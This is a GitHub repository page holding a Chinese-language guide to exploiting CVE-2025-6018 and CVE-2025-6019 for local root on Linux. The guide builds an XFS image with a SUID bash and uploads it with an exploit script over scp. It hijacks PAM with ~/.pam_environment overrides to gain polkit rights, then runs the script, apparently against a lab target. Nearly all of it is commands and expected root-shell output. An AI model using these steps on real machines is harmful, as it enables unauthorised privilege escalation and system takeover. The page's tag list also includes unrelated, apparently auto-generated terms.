e1arth/CVE-2025-6018
GitHub: e1arth/CVE-2025-6018
针对CVE-2025-6018和CVE-2025-6019的本地提权利用工具,通过构造恶意XFS镜像配合PAM环境变量劫持实现root权限获取。
Stars: 0 | Forks: 0
# CVE-2025-6018 + CVE-2025-6019 提权指南
[中文](https://github.com/muyuanlove/CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit/blob/main/readme_zh-cn.md)
## 📋 快速利用步骤
### 步骤 1:准备 XFS 镜像(本地机器)
```
# 创建 300MB XFS 镜像
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# 挂载并安装 SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# 验证 (应显示 300M)
ls -lh xfs.image
```
### 步骤 2:上传文件到目标
```
# 上传 exploit 脚本和镜像
scp exp.sh abc@10.129.252.9:~/
scp xfs.image abc@10.129.252.9:~/
```
### 步骤 3:首次登录 - 配置 PAM
```
# SSH 登录到目标
ssh phileasfogg3@10.129.252.9
# 写入 PAM 环境变量
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF
# 验证配置
cat ~/.pam_environment
# 🔥 关键:注销 (以激活 PAM 配置)
exit
```
### 步骤 4:第二次登录 - 执行提权
```
# 通过 SSH 重新登录 (PAM 配置现已激活)
ssh phileasfogg3@10.129.252.9
# 验证 PAM 是否处于活动状态 (应返回 "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# 执行 privilege escalation 脚本
bash exp.sh
```
## ✅ 成功指标
如果利用成功,你应该看到:
```
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!
════════════════════════════════════════════════════════════
║ ROOT FLAG ║
║ ║
════════════════════════════════════════════════════════════
bash-5.2# whoami
root
```
## 🔧 故障排除
| 问题 | 解决方案 |
| ----------------------------- | ------------------------------------------------ |
| `CanReboot` 返回 `('no',)` | 确保你已登出并重新登录(步骤 3) |
| `Not authorized` 错误 | 检查 `~/.pam_environment` 内容是否正确 |
| 找不到 SUID bash | 重新上传 `xfs.image` 并验证 SUID 位是否设置 |
## 📌 关键点
- ✅ **必须登出并重新登录**:PAM 配置仅在新会话中生效
- ✅ **验证 CanReboot**:在运行脚本前确认它返回 `('yes',)`
- ✅ **使用 SSH 登录**:不要使用 `ssh -t user@host "cmd"` 风格的执行方式
## 🐱 猫卫士
**如果失败,请确保每一步都严格按照顺序执行!**
标签:CSV导出, CVE-2025-6018, CVE-2025-6019, Exploit, PAM利用, Polkit, SUID提权, systemd, Web报告查看器, XFS文件系统, 内存分配, 协议分析, 应用安全, 提权漏洞, 攻击脚本, 本地提权, 权限提升, 漏洞复现, 网络安全, 隐私保护